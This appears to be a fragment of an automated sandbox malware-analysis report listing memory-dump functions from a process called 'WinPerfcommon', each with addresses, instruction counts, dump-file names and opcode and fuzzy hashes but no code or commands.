                                                                  • Instruction ID: d2cc7f9db9ba5d9b76573e3d7f3418e3d2ce5d126846c9728f9d3f079d62f072
                                                                  • Opcode Fuzzy Hash: 512ea99d560c491913a2260ec2f57165c35fb04d990de14389cfc5288d7c128a
                                                                  • Instruction Fuzzy Hash: 22110730A198599FDB98EF18C865ABDB7B1FF59314F0411BED10EE3691CE35A9808B41
                                                                  Function 00007FF84935384E Relevance: .1, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dd47ac6683d8485b9798aa1d9bd405ed61c67763e28fc3025bce9965d606951b
                                                                  • Instruction ID: 69a81a1a0bfca216b7002e631e4afd4a107bbbdf44abd6cc0a1292980c5cec5a
                                                                  • Opcode Fuzzy Hash: dd47ac6683d8485b9798aa1d9bd405ed61c67763e28fc3025bce9965d606951b
                                                                  • Instruction Fuzzy Hash: 4811443160C686CFEB29AF08D4542E4B3A1FF893A1F10023AD90DC72C1DB3AA950CB91
                                                                  Function 00007FF849358EBE Relevance: .1, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d12a866ac60a21aba76a8b6e39cf2d89e8ab4deef605da8208a59d60657c5c1a
                                                                  • Instruction ID: b20358b0d8736759e00ea7a1afa99524348acc6ff14523d36d44c22d75c7e167
                                                                  • Opcode Fuzzy Hash: d12a866ac60a21aba76a8b6e39cf2d89e8ab4deef605da8208a59d60657c5c1a
                                                                  • Instruction Fuzzy Hash: FF116B316086068FEB15EF18D4406E4B3A1FF493A1F10153AD909C72C1DB39A950CB90
                                                                  Function 00007FF848F40C38 Relevance: .1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5b7d2fde9cb2d1ccb79365547936b09882cadc3ddf177731465cb0d22a360382
                                                                  • Instruction ID: dcca8417c31c62889d0fd83e76fd66e27d96199f3723e46fd0b4076ff004492d
                                                                  • Opcode Fuzzy Hash: 5b7d2fde9cb2d1ccb79365547936b09882cadc3ddf177731465cb0d22a360382
                                                                  • Instruction Fuzzy Hash: FF11C232E0D649DFE742BB7498011AD7BB0EFA2790F0544B3C444EB2D3DA3815058795
                                                                  Function 00007FF849356CFE Relevance: .0, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5de79994e55304c793e18ac63d2cad0f56c54664c4f4bde21a3a7201177935b6
                                                                  • Instruction ID: 977fea6f13fc8872a06d3c876d3b2dc3490de2e373d79e686d29fdbcf977ca2e
                                                                  • Opcode Fuzzy Hash: 5de79994e55304c793e18ac63d2cad0f56c54664c4f4bde21a3a7201177935b6
                                                                  • Instruction Fuzzy Hash: 4CF0CD31B0CA484FE758EF1CE8061B973D1FF99261B04053FD04EC3652DE3558414741
                                                                  Function 00007FF848F40C40 Relevance: .0, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8eac2b4c306526e49d7a814c577c03a9b458596d6d349e46f7fae89e272835ac
                                                                  • Instruction ID: 70beffd77707c1b9d3c44efaf68984bd2b795fc2a645915a215ee8218cee30d4
                                                                  • Opcode Fuzzy Hash: 8eac2b4c306526e49d7a814c577c03a9b458596d6d349e46f7fae89e272835ac
                                                                  • Instruction Fuzzy Hash: 5701ED32E0D288CFE742BB2498001A97BB0EFA2750F0440B3C844EB2D3DA3826098B94
                                                                  Function 00007FF84935BB82 Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c69efc622a77b4082278066e237a0c32f528919d02a458e155ba976790f1982a
                                                                  • Instruction ID: 24e2d20a42fe29025b0acfac0a883058bbd7857fcabc146aca9045608a3fc4eb
                                                                  • Opcode Fuzzy Hash: c69efc622a77b4082278066e237a0c32f528919d02a458e155ba976790f1982a
                                                                  • Instruction Fuzzy Hash: 9611B030A1885EDFCFA8EF88D890AADBBB1FF59350F101179D00EE3295CA356841CB54
                                                                  Function 00007FF84935619D Relevance: .0, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: faa61e3640c458abf5628bde7d0f1f71b6532ff59ce20fe490adedab184fb15c
                                                                  • Instruction ID: 97e0e9a6e757917725083e520724aa1e4f0d2b345921a704c52f88e0c61a2d2d
                                                                  • Opcode Fuzzy Hash: faa61e3640c458abf5628bde7d0f1f71b6532ff59ce20fe490adedab184fb15c
                                                                  • Instruction Fuzzy Hash: ACF0497184E3C54FD3129F748C259A6BFE0EF5B21470A86EAD089CB5A3C65D858A8711
                                                                  Function 00007FF849351FDB Relevance: .0, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 75141689ea46d248fe11dd50e088b66bd8f110f210a4505ae01e32310a719989
                                                                  • Instruction ID: 76a85803e5b6fb10d4cbe1f7dbf91c818c9372d067af2c75c6b3c48b3420afdd
                                                                  • Opcode Fuzzy Hash: 75141689ea46d248fe11dd50e088b66bd8f110f210a4505ae01e32310a719989
                                                                  • Instruction Fuzzy Hash: 72016D3090895CCFCF98EF18C894BE9B7B0FBA9315F0401A9C40DE7291CA35AAC0CB80
                                                                  Function 00007FF848F40C48 Relevance: .0, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 13c0853ee24928f0cb7b9a91faab21e0b8893d78391b972d7313a6b2e1158b97
                                                                  • Instruction ID: 57dabf530fe163df50332a78522224934fa8337c9d555b25bd6d1e396247ebb4
                                                                  • Opcode Fuzzy Hash: 13c0853ee24928f0cb7b9a91faab21e0b8893d78391b972d7313a6b2e1158b97
                                                                  • Instruction Fuzzy Hash: 2001CC31E0D288DFE742BB2488001A97BB0EF92740F0441F3D444EB2D3DA386A44C784
                                                                  Function 00007FF849357319 Relevance: .0, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 23665159f78f381b8fbd0132ec6a48cb83ec413b65f62da415733afec9ada006
                                                                  • Instruction ID: 0b79be2ed7bb6f11570fbfe39a82ca22e63bad10def8f73b83430371d4c1a3e8
                                                                  • Opcode Fuzzy Hash: 23665159f78f381b8fbd0132ec6a48cb83ec413b65f62da415733afec9ada006
                                                                  • Instruction Fuzzy Hash: 4801DB70D0C999CFCB98EF58C464AB8BBB1FBA9350F0405A9C00ED7291DA356980CB44
                                                                  Function 00007FF849351FDA Relevance: .0, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 711bb203eca7a8838e0349bd66f41666ff485e36e968a8e22b9439c65e1b674a
                                                                  • Instruction ID: bcb62d84c0f85a36e8355933d7c6a0acb14885240b616e815e41cd2078b5c90c
                                                                  • Opcode Fuzzy Hash: 711bb203eca7a8838e0349bd66f41666ff485e36e968a8e22b9439c65e1b674a
                                                                  • Instruction Fuzzy Hash: 2501FB3090895CCFCF99EF18C898BE8B7B0FBA8315F5401A9D40DE7291CA759AC1CB41
                                                                  Function 00007FF848F45843 Relevance: .0, Instructions: 39COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 43acc274d1bd756054351bdfc031db983fc5327fac3aa7f1e03da3bfc95b0f01
                                                                  • Instruction ID: 10698a8de4f6294da7a8f2182ca481fffe26d9a74ee4397c9d96f1386dcd6fb3
                                                                  • Opcode Fuzzy Hash: 43acc274d1bd756054351bdfc031db983fc5327fac3aa7f1e03da3bfc95b0f01
                                                                  • Instruction Fuzzy Hash: A701123091C41E8FEB65FB14D8417F873A1FBA8751F5040BAD85EE32D2EF2879854A49
                                                                  Function 00007FF848F40C50 Relevance: .0, Instructions: 39COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 12d2bb01f66e5eaa197e6fc96b632be0c4a7b5db3dbf6f2ca24c84462e63a2b0
                                                                  • Instruction ID: c638fbd816b8416099eee0a33bef4845c3b850e494117df034c3d5162113d73a
                                                                  • Opcode Fuzzy Hash: 12d2bb01f66e5eaa197e6fc96b632be0c4a7b5db3dbf6f2ca24c84462e63a2b0
                                                                  • Instruction Fuzzy Hash: 63017830D0D389DFE742BB6488445AA7BB0EFA2744F1441F3D845EB2D3DA386A448745
                                                                  Function 00007FF849352052 Relevance: .0, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4801783ea8a21e4c0b9f0987179f103bc6937ade6411744aab4edf4cc501eaad
                                                                  • Instruction ID: b9311d9723850b7660ba889d516fd3f9ae08abe8ebff70b21eac3847baeea908
                                                                  • Opcode Fuzzy Hash: 4801783ea8a21e4c0b9f0987179f103bc6937ade6411744aab4edf4cc501eaad
                                                                  • Instruction Fuzzy Hash: DEF0623184E2C59FD726EF7088515E57FB4EF47354F1900F6D445C70A2C66D2616C751
                                                                  Function 00007FF84935C962 Relevance: .0, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e93e3de55a6e2fb9d54d4c60812d4aeecadbcbe73eb480b83dfddedb439855e7
                                                                  • Instruction ID: dc0d97da77edde882eec8513cce15f97dc3be7f05510be5356a3b4052a88b006
                                                                  • Opcode Fuzzy Hash: e93e3de55a6e2fb9d54d4c60812d4aeecadbcbe73eb480b83dfddedb439855e7
                                                                  • Instruction Fuzzy Hash: 3EF0C23184E3C69FD7129F7088115E9BFF4AF47254F1810FAD4458B0A2C62C5506C352
                                                                  Function 00007FF849357722 Relevance: .0, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c0a6fd0f1e1d581362225282f48cfef63542912d1b31d9460e29ee8701f2c1a3
                                                                  • Instruction ID: e68f00ca2667169a98a8089062070c046db4be840c3a03b9a702efc50fda4fa0
                                                                  • Opcode Fuzzy Hash: c0a6fd0f1e1d581362225282f48cfef63542912d1b31d9460e29ee8701f2c1a3
                                                                  • Instruction Fuzzy Hash: 10F0963144D3C59FD3129F7098555A57FB4AF47214B0900E6E446CB0A2D62C1A16C761
                                                                  Function 00007FF848F435BC Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d6ebc5579eec9db870b331dfabd08f6463e24305d69d6b705250a8c025904ec6
                                                                  • Instruction ID: 867ded10bbe733e371fb543723d775ec9ada051e23dc0d7416ddba1cd3506e92
                                                                  • Opcode Fuzzy Hash: d6ebc5579eec9db870b331dfabd08f6463e24305d69d6b705250a8c025904ec6
                                                                  • Instruction Fuzzy Hash: 91F0E1309089198FDB55EF08C894EAAB3F1FBA8351F0041A9D40EE7390DB35AD45CF85
                                                                  Function 00007FF849358E98 Relevance: .0, Instructions: 34COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9cee8117c47a62174028b59e3e6255082e17e33ee164445033b8c5b885e83e36
                                                                  • Instruction ID: 60e9f9be9b0ea166a7d578ff91eae7856016517a09c7d4b7c3319ec10dc051bf
                                                                  • Opcode Fuzzy Hash: 9cee8117c47a62174028b59e3e6255082e17e33ee164445033b8c5b885e83e36
                                                                  • Instruction Fuzzy Hash: DDF0B43190D5868EF7357E1495011F8E620EF4A3E5F606836C40E831C2CE2929418691
                                                                  Function 00007FF848F40B77 Relevance: .0, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 504b311779b8bfe959ef01a9381299f03388722dbcf03477fb862cad025012d7
                                                                  • Instruction ID: fa48fdf62ec04928c849a7bfcd04bdf5b1c62f6d44fef6a504616fa16385c0a3
                                                                  • Opcode Fuzzy Hash: 504b311779b8bfe959ef01a9381299f03388722dbcf03477fb862cad025012d7
                                                                  • Instruction Fuzzy Hash: F5E0223020DA49CFC702BB38CC944D17BA0EF06614FE910AED049D7266D3205869CB40
                                                                  Function 00007FF849350A29 Relevance: .0, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4a6db53464135a96032a607e07f823c7c3d6ae9f17ead2f3f633f20af33734a8
                                                                  • Instruction ID: ce867a3d251161be1350abc3ea83da331b2be9c5762f81b33d52908927818882
                                                                  • Opcode Fuzzy Hash: 4a6db53464135a96032a607e07f823c7c3d6ae9f17ead2f3f633f20af33734a8
                                                                  • Instruction Fuzzy Hash: BDE06531A0C5468EE761FF00D8507A87352DBDA3B0F145275C00D872C9DE3969824681
                                                                  Function 00007FF848F45447 Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: be0c33059f02bc6c5460181056d9ed3b6da67ebe8703d163f4431e8e073ce9c6
                                                                  • Instruction ID: aae9bcc5ddbe83a8d2480da5624d938a0615ab20430e0cf98c81cd4409ae9021
                                                                  • Opcode Fuzzy Hash: be0c33059f02bc6c5460181056d9ed3b6da67ebe8703d163f4431e8e073ce9c6
                                                                  • Instruction Fuzzy Hash: 84E01234A0D0164BF794B754C4407A92260DF94790F15407AED5EA33C6DE3CAE418B09
                                                                  Function 00007FF848F46A7D Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5d005fac91cdb68f9ef86c7593f3fb93ae5fa515ac9ed183fda4f19fd83cd6f8
                                                                  • Instruction ID: 5182a03625d9d1f8322b0cc7bf7cfeb4f38824d4321cd3d437ff879356d8d52d
                                                                  • Opcode Fuzzy Hash: 5d005fac91cdb68f9ef86c7593f3fb93ae5fa515ac9ed183fda4f19fd83cd6f8
                                                                  • Instruction Fuzzy Hash: 77E0EC21E2D5520AF399B36848363B99181EBA5B94F4941BAA80EE72D3DE0C5884469A
                                                                  Function 00007FF849352D47 Relevance: .0, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9c6f9ccb9f6852bcb3c0f3204b6acf6cb8d5dcb5c787e45ec6ea705f6b3065d8
                                                                  • Instruction ID: 96b79f887c0238edcda7e8ec93c32e710c5cfa94b4023151d5cc5da49c31c355
                                                                  • Opcode Fuzzy Hash: 9c6f9ccb9f6852bcb3c0f3204b6acf6cb8d5dcb5c787e45ec6ea705f6b3065d8
                                                                  • Instruction Fuzzy Hash: 9CE0C231E0C7C24FF72B2A7008601796FD08F0B3C4B0918B2C0598A1C3D94828098622
                                                                  Function 00007FF8493583AD Relevance: .0, Instructions: 16COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6aa28bd7a03a160e5cc4a0cb4c6d14203445803c140c172cad24f3d5f9d6f04e
                                                                  • Instruction ID: e5a3df85a7fee2918be2af77e55dcae786859636869e4807b23a190d48d2d5dd
                                                                  • Opcode Fuzzy Hash: 6aa28bd7a03a160e5cc4a0cb4c6d14203445803c140c172cad24f3d5f9d6f04e
                                                                  • Instruction Fuzzy Hash: C9D0A772D0C6C74FE7365A7804A4175DBD09F4F29874D0E79C4894B3C3ED8438568392
                                                                  Function 00007FF848F406A5 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ac722e97edf49119d6f2223323b39f6d9a7dcdbbd9bfa0954a2acfcdf267815e
                                                                  • Instruction ID: 59dbda28bf680fc7d0d4185812916ee7bb9a36d84dcfdce682c40d3ef0890cdf
                                                                  • Opcode Fuzzy Hash: ac722e97edf49119d6f2223323b39f6d9a7dcdbbd9bfa0954a2acfcdf267815e
                                                                  • Instruction Fuzzy Hash: BBC08C21D1E40B08F490B3AE18020ACA1005BF4ED0FD00033CC0D601C3AE0D20D5018E
                                                                  Function 00007FF84935B7CB Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ae6c92dcc6bb0d4fab5328cc4addbf46ec0257a1f268a4f9d158cc6c345c173b
                                                                  • Instruction ID: 078c070e8e3b06599b151b2ba240514f51810c4b7585bc52d13305f8bc45d0dd
                                                                  • Opcode Fuzzy Hash: ae6c92dcc6bb0d4fab5328cc4addbf46ec0257a1f268a4f9d158cc6c345c173b
                                                                  • Instruction Fuzzy Hash: DAB02B0570850545E7003A6C74800E4A341CF84030B500472CC05C038EEC1B48C10180
                                                                  Function 00007FF848F41280 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e37c9eec6782536c5558a0d5d5aa2fb9fd1c106da5083032bc0c1e53f1350889
                                                                  • Instruction ID: e0acd4d7294105a89fa9f19f05122d822d44b7fd0b9cdf8978aa750188069a35
                                                                  • Opcode Fuzzy Hash: e37c9eec6782536c5558a0d5d5aa2fb9fd1c106da5083032bc0c1e53f1350889
                                                                  • Instruction Fuzzy Hash: 1FC08C305108088FC908FB28C88480833A0FB19200FC200A0E009C71B0E219DCC1C741
                                                                  Function 00007FF848F40B18 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ac08d3592d3d8194044a73ad7b904a2861d7badd4d702d5ae38e67d6fd400711
                                                                  • Instruction ID: 08de04f890eea23caef79981a65196821633bf316120dce222e45d53c085f3f4
                                                                  • Opcode Fuzzy Hash: ac08d3592d3d8194044a73ad7b904a2861d7badd4d702d5ae38e67d6fd400711
                                                                  • Instruction Fuzzy Hash: FBC04C305158099FC944F72DC98595476A0FB1D215BD50190E40DC72B5E65A9C95C745
                                                                  Function 00007FF84935382B Relevance: .0, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e5cbd3cfa7109d848861f8cb4e40c845cf41b60e34970c5814db506dcaceb96f
                                                                  • Instruction ID: 890835317a29e229b72a650bf95953fba2ad5f6945fb71c6b58a34645e8c73fb
                                                                  • Opcode Fuzzy Hash: e5cbd3cfa7109d848861f8cb4e40c845cf41b60e34970c5814db506dcaceb96f
                                                                  • Instruction Fuzzy Hash: FDD0C930A0C5C7CDF53D7E018120639E1A09F8EBA4EE0603DC45F429C2CD1D79096602
                                                                  Function 00007FF8493563C5 Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
                                                                  • Instruction ID: e023afb65de06187ebb23d8208d4746cb23008e35b0678ff9c83eb0fb9042ccf
                                                                  • Opcode Fuzzy Hash: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
                                                                  • Instruction Fuzzy Hash: 74C04C302048549FDB94DE0DC0D4B38B3E1EF4D341B5000B8E04ACB2A5C9289C45D710
